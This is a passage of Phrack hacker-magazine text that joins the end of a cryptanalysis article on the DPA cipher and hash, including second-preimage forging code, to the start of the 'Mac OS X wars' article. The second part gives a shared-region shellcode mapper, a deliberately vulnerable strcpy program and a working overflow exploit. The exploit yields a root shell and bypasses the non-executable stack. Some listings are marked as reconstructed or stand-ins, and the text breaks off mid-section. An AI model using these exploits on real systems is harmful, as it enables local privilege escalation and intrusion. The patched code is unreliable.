There are many ways to design an MDC function. Some functions are based on
the MD4 function, such as MD5 or the SHA* functions, which heavily rely on 
boolean algebra and operations in GF(2^32); some are based on hard number 
theoretic problems such as the one underlying RSA; and finally some others 
are block cipher based.

The third category is particularly interesting since the security of the
hash function can be reduced to the one of the underlying block cipher. 
This is of course only true with a good design.

--[ 8.2 - DPAsum() algorithm

The DPA-based hash function lies in the functions DPA_sum() and 
DPA_sum_write_to_file() which can be found respectively in file sum.c and

Let's detail them a little bit using pseudo code:

Let M be the message to hash, let M(i) be the i'th 128 bit block of the 
message. Let N = DPA_BLOCK_SIZE * i + j be the size in bytes of the message
where i and j are integers such that i = N / DPA_BLOCK_SIZE and 0 <= j < 16.
Let C be an array of 128 bit elements where intermediary results of the hash
calculation are stored. The last element of this array is the hash of the
message.

func DPA_sum(K0,M,C):
    K0 = key("deadbeef");
    IV = "0123456789abcdef";
    C(0) = E( IV , K0);
    C(1) = E( IV xor M(0) , K0);
    FOR a = 1 to i-1:
        C(a+1) = E( C(a) xor M(a) , K0);

    if j == 0:
        C(i+1) = E( C(i) xor 000...000 , K0)
    else:
        C(i+1) = E( C(i) xor PAD( M(i) ) , K0)
        C(i+2) = E( C(i+1) xor 000...00S , K0) /* S = 16-j */

func DPA_sum_write_to_file(C, file):
    write the last element of C (the hash) to file


--[ 8.3 - Weaknesses in the design/implementation

We noticed several implementation mistakes in the code:

a) Using the algorithm of hash calculation, every element of array C is 
defined recursively however C(0) is never used in calculation. This doesn't
impact security in itself but is somewhat strange and could let us think 
that the function was not designed before being programmed.

b) When the size of M is not a multiple of DPA_BLOCK_SIZE (j is not equal 
to 0) then the algorithm calculates the last element using a xor mask where
the last byte gives information on the size of the original message. 
However, what is included in the padding is not the size of the message 
itself but rather the size of the padding.

If we take the example of the well known Merkle-Damgard construction, on 
which the MD{4,5} and SHA-{0,1} functions are based, then the length of the 
message is appended in order to prevent collision attacks between
messages of different sizes. Therefore in the DPASum() case, appending j 
to the message is not sufficient as it would be possible to find collisions
for messages of size (DPA_BLOCK_SIZE*a + j) and (DPA_BLOCK_SIZE*b + j) where
obviously a and b are different.

Remark: The fact that the IV and the master key are initially fixed is not
a problem in itself since we are dealing with MDC here.

--[ 8.4 - A (2nd) preimage attack

Because of the hash function construction properties, being given a 
message X, it is trivial to create a message X' such that h(X) = h(X'). This
is called building a 2nd preimage attack.

We built a quick & dirty program to illustrate it (Annexe C). It takes a 
32 byte message as input and produces another 32 byte message with the same 
hash:

$ cat to.hack | hexdump -C
00000000 58 41 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 |XALKXCLKSDLFKSDF|
00000010 58 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 0a |XLKXCLKSDLFKSDF.|
$ ./dpa -s to.hack
$ gcc break_hash.c *.o -o break_hash -I ./include
$ ./break_hash to.hack > hacked
$ ./dpa -s hacked
$ cat hacked | hexdump -C
00000000 43 4f 4d 50 4c 45 54 45 4c 59 42 52 4f 4b 45 4e |COMPLETELYBROKEN|
00000010 3e bf de 93 d7 17 7e 1d 2a c7 c6 70 66 bb eb a3 |>.....~.*..pf...|

Nice isn't it ? :-) We were able to write arbitrary data in the first 16 
bytes and then to calculate the next 16 bytes so that the 'hacked' file had
the exact same hash. But how did we do such an evil thing?

Assuming the size of both messages is 32 bytes then:

h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, it is obvious that:

h(M1) = h(M2) is equivalent to
E(E(M1(0) xor IV,K0) xor M1(1),K0) = E(E(M2(0) xor IV,K0) xor M2(1),K0)

Which can be reduced to:
E(M1(0) xor IV,K0) xor M1(1) = E(M2(0) xor IV,K0) xor M2(1)

Which therefore gives us:
M2(1) = E(M2(0) xor IV,K0) xor E(M1(0) xor IV,K0) xor M1(1)  [A]

Since M1,IV,K0 are known parameters then for a chosen M2(0), [A] gives us 
M2(1) so that h(M1) = h(M2).
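Equation [A] holds whatever E is, so it can be demonstrated with a toy
16 byte "cipher" standing in for DPA. Everything below is an illustrative
stand-in: E_toy is an arbitrary made-up block transformation, and h_toy
follows the two-block hash formula above, not the real DPA code.

```c
#include <assert.h>
#include <string.h>

#define BS 16

/* Arbitrary 16 byte block transformation used as a black box E. */
static void E_toy(const unsigned char *in, unsigned char *out)
{
    int i;
    for (i = 0; i < BS; i++)
        out[i] = (unsigned char)((((in[i] ^ 0x5a) * 7) + i) & 0xff);
}

static void xor_block(unsigned char *dst, const unsigned char *src)
{
    int i;
    for (i = 0; i < BS; i++)
        dst[i] ^= src[i];
}

/* h(M) = E(E(M(0) xor IV) xor M(1)) for a 32 byte message */
static void h_toy(const unsigned char *m0, const unsigned char *m1,
                  const unsigned char *iv, unsigned char *out)
{
    unsigned char t[BS];
    int i;
    for (i = 0; i < BS; i++)
        t[i] = m0[i] ^ iv[i];
    E_toy(t, t);
    xor_block(t, m1);
    E_toy(t, out);
}

/* Equation [A]: given (M1(0), M1(1)) and a chosen M2(0), derive M2(1)
 * so that h(M2) = h(M1). */
static void forge_m2_1(const unsigned char *m1_0, const unsigned char *m1_1,
                       const unsigned char *m2_0, const unsigned char *iv,
                       unsigned char *m2_1)
{
    unsigned char a[BS], b[BS];
    int i;
    for (i = 0; i < BS; i++) {
        a[i] = m2_0[i] ^ iv[i];
        b[i] = m1_0[i] ^ iv[i];
    }
    E_toy(a, a);
    E_toy(b, b);
    for (i = 0; i < BS; i++)
        m2_1[i] = a[i] ^ b[i] ^ m1_1[i];
}
```

The forged second block cancels E(M2(0) xor IV) inside the hash, leaving
exactly the chaining value of the original message.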

Remark 1: Actually such a result can be easily generalized to n byte 
messages. In particular, the attacker can put anything in his message and
"correct" it using the last blocks (if n >= 32).

Remark 2: Of course building a preimage attack is also very easy. We 
mentioned previously that we had for a 32 bytes message:
h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, Mi(1) = E^-1(h(Mi),K0) xor E(Mi(0) xor IV,K0)     [B]

The [B] equation tells us how to generate Mi(1) so that we have h(Mi) in
output. It doesn't seem to be really a one way hash function does it ? ;-)
Building a hash function out of a block cipher is a well known problem in
cryptography which doesn't only involve the security of the underlying 
block cipher. One should rely on one of the many well known and heavily 
analyzed algorithms for this purpose instead of trying to design one.

--[ 9 - Conclusion

We put into evidence some weaknesses of the cipher and were also able to 
totally break the proposed hash function built out of DPA. In his paper, 
Veins implicitly set the bases of a discussion to which we wish to deliver
our opinion. We claim that it is necessary to properly understand 
cryptology before using it. The goal of this paper wasn't to illustrate 
anything else but that fact. Being a hacker or not, paranoid or simply 
careful, the rule is the same for everybody in this domain: nothing should 
be done without reflection.

--[ 10 - Greetings

#TF crypto dudes for friendly and smart discussions and especially X for 
giving me a lot of hints. I learned a lot from you guys :-)
#K40r1 friends for years of fun ;-) Hi all :)
Finally but not least my GF and her kindness which is her prime 
characteristic :> (However if she finds out the joke in the last sentence
I may die :|)

--[ 11 - Bibliography

[DPA128] A Polyalphabetic Substitution Cipher, Veins, Phrack 62.
[FakeP63] Keeping 0day Safe, m1lt0n, Phrack(.nl) 63.
[MenVan] Handbook of Applied Cryptography, Menezes, Oorschot & Vanstone.
[Knud99] Correlation in RC6, L. Knudsen & W. Meier.
[CrypTo] Two balls ownz one,
[Vaud] An Experiment on DES - Statistical Cryptanalysis, S. Vaudenay.
[Ryabko] Adaptative chi-square test and its application to some 
cryptographic problems, B. Ryabko.
[CourtAlg] How Fast can be Algebraic Attacks on Block Ciphers ?, Courtois.
[BiSha90] Differential Cryptanalysis of DES-like Cryptosystems, E. Biham 
& A. Shamir, Advances in Cryptology - CRYPTO 1990.
[Matsui92] A new method for known plaintext attack of FEAL cipher, Matsui
& A. Yamagishi, EUROCRYPT 1992.
[NSA2007] Just kidding ;-)
[SHOUP] NTL library, V. Shoup,
[NIST2007] NIST, 2007

--[ Annexe A - Breaking the linearised version

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
/* Crappy C/C++ source. I'm in a hurry for the paper redaction so don't 
 * blame me toooooo much please ! :> */

#include <iostream>
#include <fstream>
#include <cstdio>
#include <cstring>
#include <strings.h>
#include <openssl/rc4.h>
#include <NTL/ZZ.h>
#include <NTL/ZZ_p.h>
#include <NTL/mat_GF2.h>
#include <NTL/vec_GF2.h>
#include <NTL/GF2E.h>
#include <NTL/GF2XFactoring.h>
#include "dpa.h"

using namespace NTL;

void S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= (key[i] ^ s) % 256;
}

void E2 (unsigned char *key, unsigned char *block, unsigned int shift)
{
    rbytechain (block);
    rbitshift (block, shift);
    S_E2 (key, block, shift);
}

void DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
{
    int j;
    memcpy (dst, src, DPA_BLOCK_SIZE);
    for (j = 0; j < 16; j++)
        E2 (key->subkey[j].key, dst, key->subkey[j].shift);
}

void affichage(unsigned char *chaine)
{
    int i;
    for(i=0; i<16; i++)
        printf("%.2x",(unsigned char )chaine[i]);
}

unsigned char test_p[] = "ABCD_ABCD_12____";
unsigned char test_c1[16];
unsigned char test_c2[16];
DPA_KEY key;
RC4_KEY rc4_key;

struct vect {
    unsigned char plaintxt[16];
    unsigned char ciphertxt[16];
};

struct vect toto[128];
unsigned char src1[16], src2[16];
unsigned char block1[16], block2[16];

int main()
{
    /* Key */
    unsigned char str_key[] = " _323DFF?FF4cxsdé&";
    DPA_set_key (&key, str_key, DPA_KEY_SIZE);
    /* Init our RANDOM generator */
    char time_key[16];
    snprintf(time_key, 16, "%d%d",(int)time(NULL), (int)time(NULL));
    RC4_set_key(&rc4_key, strlen(time_key), (unsigned char *)time_key);
    /* Let's crypt 16 plaintexts */
    printf("[+] Generating the plaintexts / ciphertexts\n");
    int i=0;
    int a=0;
    for(; i<128; i++) {
         RC4(&rc4_key, 16, src1, src1); // Input is nearly random :)
         DPA_ecb_encrypt (&key, src1, block1);
         RC4(&rc4_key, 16, src2, src2); // Input is nearly random :)
         DPA_ecb_encrypt (&key, src2, block2);
         for(a=0; a<16; a++) {
             toto[i].plaintxt[a] = src1[a] ^ src2[a];
             toto[i].ciphertxt[a] = block1[a] ^ block2[a];
         }
    }

    /* Now the NTL stuff */

    printf("[+] NTL stuff !\n");
    vec_GF2 m2(INIT_SIZE,128);
    vec_GF2 B(INIT_SIZE,128);
    mat_GF2 M(INIT_SIZE,128,128);
    mat_GF2 Mf(INIT_SIZE,128,128); // The final matrix !

    /* Lets fill M correctly */
    int k=0;
    int j=0;
    for(k=0; k<128; k++) // each row !
        for(i=0; i<16; i++)
            for(j=0; j<8; j++)
                M.put(i*8+j,k,(toto[k].plaintxt[i] >> j)&0x1);

    GF2 d;
    determinant(d, M);

    /* if !det then it means the vectors were linearly linked :'( */
    if(IsZero(d)) {
        std::cout << "det(M) = 0\n" ;
        return -1;
    }

    /* Let's solve the 128 systems :) */
    printf("[+] Calculation of Mf\n");
    for(k=0; k<16; k++) {
        for(j=0; j<8; j++) {
            for(i=0; i<128; i++)
                 B.put(i,(toto[i].ciphertxt[k] >> j)&0x1);
            solve(d, m2, M, B);

#ifdef __debug__
            std::cout << "m2 is " << m2 << "\n";
#endif

            /* store the solution as row k*8+j of Mf */
            int b=0;
            for(b=0; b<128; b++)
                Mf.put(k*8+j, b, m2.get(b));
        }
    }

#ifdef __debug__
    std::cout << "Mf = " << Mf << "\n";
#endif

    /* Now that we have Mf, let's make a test ;) */

    printf("[+] Let's make a test !\n");
    bzero(test_c1, 16);
    bzero(test_c2, 16);
    char DELTA_X[16];
    char DELTA_Y[16];
    bzero(DELTA_X, 16);
    bzero(DELTA_Y, 16);
    DPA_ecb_encrypt (&key, test_p, test_c1);

    // DELTA_X !
    unsigned char U0[] = "ABCDEFGHABCDEFG1";
    unsigned char Y0[16];
    DPA_ecb_encrypt (&key, U0, Y0);
    for(i=0; i<16; i++)
        DELTA_X[i] = test_p[i] ^ U0[i];

    // DELTA_Y !
    vec_GF2 X(INIT_SIZE,128);
    vec_GF2 Y(INIT_SIZE,128);
    for(k=0; k<16; k++)
         for(j=0; j<8; j++)
             X.put(k*8+j,(DELTA_X[k] >> j)&0x1);

    Y = Mf * X;

#ifdef __debug__
    std::cout << "X = " << X << "\n";
    std::cout << "Y = " << Y << "\n";
#endif

    GF2 z;
    for(k=0; k<16; k++)
        for(j=0; j<8; j++) {
            z = Y.get(k*8+j);
            if(!IsZero(z))
                DELTA_Y[k] |= (1 << j);
        }

    // test_c2 !

    for(i=0; i<16; i++)
        test_c2[i] = DELTA_Y[i] ^ Y0[i];

    /* Compare the two vectors */
    if(!memcmp(test_c1, test_c2, 16))
        printf("\t=> Well done boy :>\n");
    else
        printf("\t=> Hell !@#\n");

#ifdef __debug__
    affichage(test_c1);
    affichage(test_c2);
#endif

    return 0;
}
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -

--[ Annexe B - Probability evaluation of (hash32()%8 == 0)

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>


#include "dpa.h"             /* checksum128() / hash32() (assumed) */

#define NBR_TESTS 10000000

int main()
{
    int i = 0, j = 0;
    char buffer[16];
    int cmpt = 0;
    int rand = (time_t)time(NULL);
    float proba = 0;

    /* the original listing was truncated here; the test loop below is a
     * straightforward reconstruction */
    srandom(rand);
    for(i=0; i<NBR_TESTS; i++) {
        for(j=0; j<4; j++)
            ((int *)buffer)[j] = random();
        checksum128 (buffer, buffer, 16);
        if(hash32 (buffer, 16) % 8 == 0)
            cmpt++;
    }
    proba = (float)cmpt/(float)NBR_TESTS;
    printf("[+] Probability is around %f\n",proba);
    return 0;
}
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -

--[ Annexe C - 2nd preimage attack on 32 bytes messages

8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include "dpa.h"

void E2 (unsigned char *key, unsigned char *block, unsigned int shift)
{
    rbytechain (block);
    rbitshift (block, shift);
    S_E (key, block, shift);
}

void DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
{
    int j;
    memcpy (dst, src, DPA_BLOCK_SIZE);
    for (j = 0; j < 16; j++)
        E2 (key->subkey[j].key, dst, key->subkey[j].shift);
}

void affichage(unsigned char *chaine)
{
    int i;
    for(i=0; i<16; i++)
        printf("%.2x",(unsigned char )chaine[i]);
}

/* xor the 16 byte block src into dst; helper assumed by the truncated
 * original listing */
void blockchain(unsigned char *dst, unsigned char *src)
{
    int i;
    for(i=0; i<DPA_BLOCK_SIZE; i++)
        dst[i] ^= src[i];
}

int main(int argc, char **argv)
{
    DPA_KEY key;
    unsigned char str_key[] = "deadbeef";
    unsigned char IV[] = "0123456789abcdef";
    unsigned char evil_payload[] = "COMPLETELYBROKEN";
    unsigned char D0[16],D1[16];
    unsigned char final_message[32];
    int fd_r = 0;
    int i = 0;

    if(argc < 2) {
        printf("Usage : %s <file>\n",argv[0]);
        return -1;
    }

    DPA_set_key (&key, str_key,8);
    if((fd_r = open(argv[1], O_RDONLY)) < 0) {
        printf("[+] Fuck !@#\n");
        return -1;
    }

    if(read(fd_r, D0, 16) != DPA_BLOCK_SIZE) {
        printf("Too short !@#\n");
        return -1;
    }

    if(read(fd_r, D1, 16) != DPA_BLOCK_SIZE) {
        printf("Too short 2 !@#\n");
        return -1;
    }

    /* M2(1) = E(M2(0) xor IV) xor E(M1(0) xor IV) xor M1(1)  -- eq. [A] */
    memcpy(final_message, evil_payload, DPA_BLOCK_SIZE);
    blockchain(evil_payload, IV);
    DPA_ecb_encrypt (&key, evil_payload, evil_payload);
    blockchain(D0, IV);
    DPA_ecb_encrypt (&key, D0, D0);
    blockchain(evil_payload, D0);
    blockchain(evil_payload, D1);
    memcpy(final_message+DPA_BLOCK_SIZE, evil_payload, DPA_BLOCK_SIZE);

    /* write the forged 32 byte message to stdout */
    for(i=0; i<DPA_BLOCK_SIZE*2; i++)
        putchar(final_message[i]);
    return 0;
}
8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - -


              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 11               (* *)
            | - |                                            | - |
            |   |        Mac OS X wars - a XNU Hope          |   |
            |   |                                            |   |
            |   |      by nemo <>       |   |
            |   |                                            |   |
            |   |                                            |   |

--[ Contents

  1 - Introduction.

  2 - Local shellcode maneuvering.

  3 - Resolving symbols from Shellcode.

  4 - Architecture spanning shellcode.

  5 - Writing kernel level shellcode.
   5.1 - Local privilege escalation
   5.2 - Breaking chroot()
   5.3 - Advancements

  6 - Misc rootkit techniques.

  7 - Universal binary infection.

  8 - Cracking example - Prey

  9 - Passive malware propagation with mDNS

 10 - Kernel zone allocator exploitation.

 11 - Conclusion

 12 - References

 13 - Appendix A: Code

--[ 1 - Introduction

This paper was written in order to document my research while 
playing with Mac OS X shellcode.  During this process, however,
the paper mutated and evolved to cover a selection of Mac OS X 
related topics which will hopefully make for an interesting read.

Due to the growing popularity of Mac OS X on Intel over PowerPC platforms,
I have mostly focused on techniques for the former.  Many of the concepts 
shown are still applicable on PowerPC architecture, but their particular
implementation is left as an exercise for the reader.

There are already several well written documents on PowerPC and 
Intel assembly language; I will therefore make no attempt to try
and teach you these things. 

If you have any suggestions on how to shorten/tighten the code I 
have written for this paper please drop me an email with the details at:

A tar file containing the full code listings referenced in this paper 
can be found in Appendix A.

--[ 2 - Local shellcode maneuvering.

Over the years there have been many different techniques 
developed to calculate valid return addresses when 
exploiting buffer overflows in applications local to 
your system.  Unfortunately many of these techniques are
now obsolete on Intel-based Mac OS X systems with the 
introduction of a non-executable stack in version 10.4.

In the following subsections I will discuss a few historical 
approaches for calculating shellcode addresses in memory  
and introduce a new method for positioning shellcode at a 
fixed location in the address space of a vulnerable target.

--[ 2.1 Historical perspective 1: Aleph1

Over the years there have been many different techniques 
developed to calculate a valid return address when exploiting
a buffer overflow in an application local to your system. 
The most widely known of these is shown in aleph1's "Smashing 
the Stack for Fun and Profit". [9] In this paper, aleph1 simply
writes a small function get_sp() shown below.

	unsigned long get_sp(void) {
	   __asm__("movl %esp,%eax");
	}
This function returns the current stack pointer (esp). 
aleph1 then simply offsets from this value, in an attempt to hit
the nop sled before his shellcode on the stack. This method is
not as precise as it can be, and also requires the shellcode to
be stored on the stack.  This is an obvious issue if your stack is
non-executable.

--[ 2.2 Historical perspective 2: Radical Environmentalist

Another method for storing shellcode and calculating the address
of it inside another process is shown in the Radical 
Environmentalist paper written by the Netric Security Group [10].

In this paper, the author shows that the execve() syscall allows 
full control over the stack of the freshly executed process. 
Because of this, shellcode can be stored in an environment 
variable, the address of which can be calculated as displacement 
from the top of the stack.

In older exploits for Mac OS X (prior to 10.4), this technique 
worked quite well. Since there is no non-executable stack on
these older versions, the shellcode stored in the environment
can be executed directly.

--[ 2.3 Beating stack prot :P or whatever

In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11], 
the author demonstrates a technique for removing stack protection
by returning into mprotect() in libSystem (libc) before
returning into their payload. While this technique is very useful
for remote exploitation, a more elegant solution to this problem 
exists for local exploitation.

The first step to getting our shellcode in place is to get some 
shellcode. There has already been significant published work 
in this area. If you are interested to learn how to write 
shellcode for Mac OS X for use in local privilege escalation 
exploits, a couple of papers you should definitely check out are
shown in the references section. [1] and [8]. The shellcode 
chosen for the sample code is described in full in section 2 
of this paper.

The method which I now propose relies on the undocumented
Mac OS X system call "shared_region_map_file_np".
This syscall is used at runtime by the dynamic loader (dyld) 
to map widely used libraries across the address space of every 
process on the system; this functionality has many evil uses. 

The file /usr/include/sys/syscall.h contains the syscall 
number for each of the syscalls. Here is the appropriate 
line in that file which contains our syscall.

	#define SYS_shared_region_map_file_np 299

Here is the prototype for this syscall:

	int shared_region_map_file_np(
		int fd,
		uint32_t mappingCount,
		user_addr_t mappings, 
		user_addr_t slide_p 
	);

The arguments to this syscall are very simple:

fd             an open file descriptor, providing access to data that 
               we want loaded in memory.
mappingCount   the number of mappings which we want to make from the
               file descriptor.
mappings       a pointer to an array of _shared_region_mapping_np
               structs which describe each mapping (see below).
slide_p        determines whether the syscall is allowed to slide
               the mapping around inside the shared region of memory
               to make it fit.

Here is the struct definition for the elements of the third argument:

	struct _shared_region_mapping_np {
		mach_vm_address_t   	address;
		mach_vm_size_t      	size;
		mach_vm_offset_t    	file_offset;
		vm_prot_t               max_prot;  
		vm_prot_t               init_prot; 
	};

The struct elements shown above can be explained as follows:

address        the address in the shared region where the data should
               be stored.
size           the size of the mapping (in bytes)
file_offset    the offset into the file descriptor to which we must
               seek in order to reach the start of our data.
max_prot       the maximum protection of the mapping; this value is
               created by or'ing the #defines VM_PROT_READ,
               VM_PROT_WRITE and VM_PROT_EXECUTE.
init_prot      the initial protection of the mapping, again
               created by or'ing the values mentioned above.

The following #define's describe the shared region in which
we can map our data. They show the various regions within the
0x00000000->0xffffffff address space which are available for
use as shared regions. Each is defined as a starting address,
followed by a size.

#define GLOBAL_SHARED_TEXT_SEGMENT      0x90000000
#define GLOBAL_SHARED_DATA_SEGMENT      0xA0000000
#define GLOBAL_SHARED_SEGMENT_MASK      0xF0000000

#define SHARED_TEXT_REGION_SIZE         0x10000000
#define SHARED_DATA_REGION_SIZE         0x10000000
#define SHARED_ALTERNATE_LOAD_BASE      0x09000000

To make sure that the address of our shellcode does not 
contain a NULL byte (thereby making this technique viable 
for string based overflows), we position the shellcode at 
the last address in the region where a page (0x1000 bytes) 
can be mapped.  By doing so, our shellcode will be stored 
at the very top of the shared region, at an address which 
is free of NULL bytes.

The following code can be used to map some shellcode into
a fixed location by opening the file "/tmp/mapme" and writing 
our shellcode out to it. It then uses the file descriptor
to call the "shared_region_map_file_np" which maps the
code, as well as a bunch of int3's (cc), into the shared
region.

/*
 * [ sharedcode.c ]
 * by nemo, 2007
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <mach/vm_prot.h>
#include <mach/i386/vm_types.h>
#include <mach/shared_memory_server.h>
#include <string.h>
#include <unistd.h>

#define BASE_ADDR 0x9ffff000
#define PAGESIZE  0x1000
#define FILENAME  "/tmp/mapme"

char dual_sc[] =

// setuid() seteuid()

// ppc execve() code by b-r00t

// seteuid(0);
// setuid(0);
// x86 execve() code / nemo

struct _shared_region_mapping_np {
	mach_vm_address_t   	address;
	mach_vm_size_t      	size;
	mach_vm_offset_t    	file_offset;
	vm_prot_t               max_prot;   /* read/write/execute/COW/ZF */
	vm_prot_t               init_prot;  /* read/write/execute/COW/ZF */
};

int main(int argc,char **argv)
{
	int fd;
	struct _shared_region_mapping_np sr;
	char data[PAGESIZE];
	char *ptr = data + PAGESIZE - sizeof(dual_sc);

	memset(data,0xcc,PAGESIZE);          /* fill the page with int3's */
	memcpy(ptr,dual_sc,sizeof(dual_sc)); /* shellcode at end of page  */

	sr.address     = BASE_ADDR;
	sr.size        = PAGESIZE;
	sr.file_offset = 0;
	sr.max_prot    = VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE;
	sr.init_prot   = VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE;

	if((fd = open(FILENAME,O_RDWR|O_CREAT|O_TRUNC,0755)) == -1) {
		perror("open");
		exit(1);
	}

	if(write(fd,data,PAGESIZE) != PAGESIZE) {
		perror("write");
		exit(1);
	}

	if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL) == -1) {
		perror("shared_region_map_file_np");
		exit(1);
	}

	printf("[+] shellcode at: 0x%x.\n",sr.address + 
					   PAGESIZE - 
					   sizeof(dual_sc));
	return 0;
}


When we compile and execute this code, it prints the address of
the shellcode in memory. You can see this below.

	-[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode
	-[nemo@fry:~/code]$ ./sharedcode 
	[+] shellcode at: 0x9fffff71.

As you can see the address used for our shellcode is 0x9fffff71.
This address, as expected, is free of NULL bytes.

You can test that this procedure has worked as expected by 
starting a new process and connecting to it with gdb.

By jumping to this address using the "jump" command in gdb
our shellcode is executed and a bash prompt is displayed.

	-[nemo@fry:~/code]$ gdb /usr/bin/id
	GNU gdb 6.3.50-20050815 (Apple version gdb-563) 
	(gdb) r
	Starting program: /usr/bin/id 
	^C[Switching to process 752 local thread 0xf03]
	0x8fe01010 in __dyld__dyld_start ()
	(gdb) jump *0x9fffff71
	Continuing at 0x9fffff71.
	(gdb) c

In order to demonstrate how this can be used in an exploit, 
I have created a trivially exploitable program:

	/*
	 * exploitme.c
	 */

	#include <string.h>

	int main(int ac, char **av)
	{
		char buf[50] = { 0 };

		if(ac == 2)
			strcpy(buf,av[1]);

		return 1;
	}

Below is the exploit for the above program. 

	/*
	 * [ exp.c ]
	 * 2007
	 */

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	#define VULNPROG "./exploitme"
	#define OFFSET 66  
	#define FIXEDADDR 0x9fffff71

	int main(int ac, char **av)
	{
		char evilbuff[OFFSET];
		char *args[] = {VULNPROG,evilbuff,NULL};
		char *env[]  = {"TERM=xterm",NULL};
		long *ptr = (long *)&(evilbuff[OFFSET - 4]);

		memset(evilbuff,'A',OFFSET);	/* fill with "A"'s    */
		*ptr = FIXEDADDR;		/* new return address */
		execve(VULNPROG,args,env);

		return 1;
	}

As you can see we fill the buffer up with "A"'s, followed by our
return address calculated by sharedcode.c. After the strcpy() occurs 
our stored return address on the stack is overwritten with our new 
return address (0x9fffff71) and our shellcode is executed.

If we chown root /exploitme; chmod +s /exploitme; we can see
that our shellcode is mapped into suid processes, which makes
this technique feasible for local privilege escalation. Also, 
because we control the memory protection on our mapping, we bypass 
non-executable stack protection.

	-[nemo@fry:/]$ ./exp
	fry:/ root# id

One limitation of this technique is that the file you are 
mapping into the shared region must exist on the root file-
system. This is clearly explained in the comment below.

 * The split library is not on the root filesystem.  We don't
 * want to pollute the system-wide ("default") shared region
 * with it.
 * Reject the mapping.  The caller (dyld) should "privatize"
 * (via shared_region_make_private()) the shared region and
 * try to establish the mapping privately for this process.

Another limitation to this technique is that Apple has locked 
down this syscall with the following lines of code:

	 * This system call is for "dyld" only.

Luckily we can beat this magnificent protection by....
completely ignoring it.

--[ 3 - Resolving Symbols From Shellcode

In this section I will demonstrate a method which can be used to 
resolve the address of a symbol from shellcode.

This is useful in remote exploitation where you wish to access 
or modify some of the functionality of the vulnerable program. 
This may also be useful in calling some of the functions in a 
particular shared library in the address space.

The examples in this section are written in Intel assembly, nasm 
syntax. The concepts presented can easily be recreated in 
PowerPC assembler. If anyone takes the time to do this let me 

The method I will describe requires some basic knowledge about
the Mach-O object format and how symbols are stored/resolved. 
I will try to be as verbose as I can, however if more research 
is required check out the Mach-O Runtime document from the 
Apple website. [4]

The process of resolving symbols which I am describing in this
section involves locating the LINKEDIT section in memory.

The LINKEDIT section is broken up into a symbol table (symtab)
and string table (strtab) as follows:


low memory: 0x0
|---(symtab data starts here.)---| 
|<nlist struct>                  |
|<nlist struct>                  |
|<nlist struct>                  |
| ...                            |
|---(strtab data starts here.)---|
|"_mh_execute_header\0"          |
|"dyld_start\0"                  |
|"main\0"                       |
| ...                            |
himem : 0xffffffff

By locating the start of the string table and the start of the
symbol table relative to the address of the LINKEDIT section
it is then possible to loop through each of the nlist structures
in the symbol table and access their appropriate string in
the string table. I will now run through this technique in fine
detail.

To resolve symbols we will start by locating the mach_header in 
memory. This will be the start of our mapped in mach-o image.
One way to find this is to run the "nm" command on our binary
and locate the address of the __mh_execute_header symbol.

Currently on Mac OS X, the executable is simply mapped in at 
the start of the first page, 0x1000. 

We can verify this as follows:

	-[nemo@fry:~]$ nm /bin/sh | grep mh_
	00001000 A __mh_execute_header

	(gdb) x/x 0x1000
	0x1000: 0xfeedface

As you can see the magic number (0xfeedface) is at 0x1000.
This is our Mach-O header. The struct for this is shown 
below.

	struct mach_header {
	    uint32_t magic; 
	    cpu_type_t cputype; 
	    cpu_subtype_t cpusubtype; 
	    uint32_t filetype; 
	    uint32_t ncmds; 
	    uint32_t sizeofcmds; 
	    uint32_t flags; 
	};

In my shellcode I assume that the file we are parsing always
has a LINKEDIT section and a symbol table load command 
(LC_SYMTAB).  This means that I do not bother parsing the
mach_header struct. However if you do not wish to make this 
assumption, it is easy enough to loop ncmds number of times 
while parsing the load commands.

Directly after the mach_header struct in memory are a bunch
of load_commands. Each of these commands begins with a "cmd"
id field, and the size of the command.

Therefore, we start our code by setting ecx to the address of 
the first load command, directly after the mach_header struct 
in memory. This positions us at 0x101c. We then null out some 
of the registers to use later in the code. 

	;# null out some stuff (ebx,edx,eax)
        xor     ebx,ebx
	mul     ebx                            

	;# position ecx past the mach_header.
	xor	ecx,ecx
        mov     word cx,0x101c              

For symbol resolution, we are only interested in LC_SEGMENT 
commands and the LC_SYMTAB. In particular we are looking for
the LINKEDIT LC_SEGMENT struct. This is explained in more 
detail later.

The #define's for these are in /usr/include/mach-o/loader.h
as follows:

	#define LC_SEGMENT      0x1     
		/* segment of this file to be mapped */
	#define LC_SYMTAB       0x2     
		/* link-edit stab symbol table info */

The LC_SYMTAB command uses the following struct:

	struct symtab_command {
	    uint32_t cmd; 
	    uint32_t cmdsize; 
	    uint32_t symoff; 
	    uint32_t nsyms; 
	    uint32_t stroff; 
	    uint32_t strsize; 
	};

The symoff field holds the offset from the start of the file to 
